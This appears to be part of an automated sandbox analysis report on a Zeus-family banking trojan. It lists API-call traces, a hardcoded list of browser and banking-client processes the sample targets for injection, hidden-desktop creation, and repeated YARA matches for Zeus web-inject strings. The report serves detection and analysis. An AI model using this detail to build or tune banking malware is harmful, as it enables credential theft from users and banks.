    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe6_2_02566CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe 6_2_02561900
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 6_2_02553610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 8_2_025D78A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe8_2_025D6CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe8_2_025D6CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe8_2_025D6CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe8_2_025D6CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe 8_2_025D1900
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 8_2_025C3610
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02C995B0 CreateDesktopA,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,CloseHandle,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,1_2_02C995B0

    System Summary

    Source: 1.3.svchost.exe.39c0000.10.unpack, type: UNPACKEDPE Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.5AFlyarMds.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.2c90000.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.32.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.15.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 23.2.cUKxeliGgCix.exe.3200000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.23.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.13.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 33.2.cUKxeliGgCix.exe.32f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.21.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.25.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 37.2.cUKxeliGgCix.exe.3140000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 23.2.cUKxeliGgCix.exe.2e42000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 21.2.cUKxeliGgCix.exe.22d2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.30.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 33.2.cUKxeliGgCix.exe.3152000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 25.2.cUKxeliGgCix.exe.8f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.29b2000.4.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.2a60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.33.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 13.2.cUKxeliGgCix.exe.3100000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 13.2.cUKxeliGgCix.exe.2e42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 31.2.cUKxeliGgCix.exe.fe2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.5AFlyarMds.exe.407000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 37.2.cUKxeliGgCix.exe.2d32000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.2a06c00.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 15.2.cUKxeliGgCix.exe.2482000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 23.2.cUKxeliGgCix.exe.3200000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.14.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 35.2.cUKxeliGgCix.exe.20c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 19.2.cUKxeliGgCix.exe.2542000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 31.2.cUKxeliGgCix.exe.1040000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.27.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.31.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.40.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.20.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.37.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.88d400.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 35.2.cUKxeliGgCix.exe.20c0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.42.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.35.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.34.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 25.2.cUKxeliGgCix.exe.892000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 21.2.cUKxeliGgCix.exe.22d2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 27.2.cUKxeliGgCix.exe.1590000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 15.2.cUKxeliGgCix.exe.2482000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 6.2.cUKxeliGgCix.exe.23f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 13.2.cUKxeliGgCix.exe.2e42000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.29.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.41.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 13.2.cUKxeliGgCix.exe.3100000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.40.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.88e000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 27.2.cUKxeliGgCix.exe.1590000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 35.2.cUKxeliGgCix.exe.2062000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.3.5AFlyarMds.exe.6ff110.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.16.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 5.2.cUKxeliGgCix.exe.2f60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 39.2.cUKxeliGgCix.exe.1272000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.2c90000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
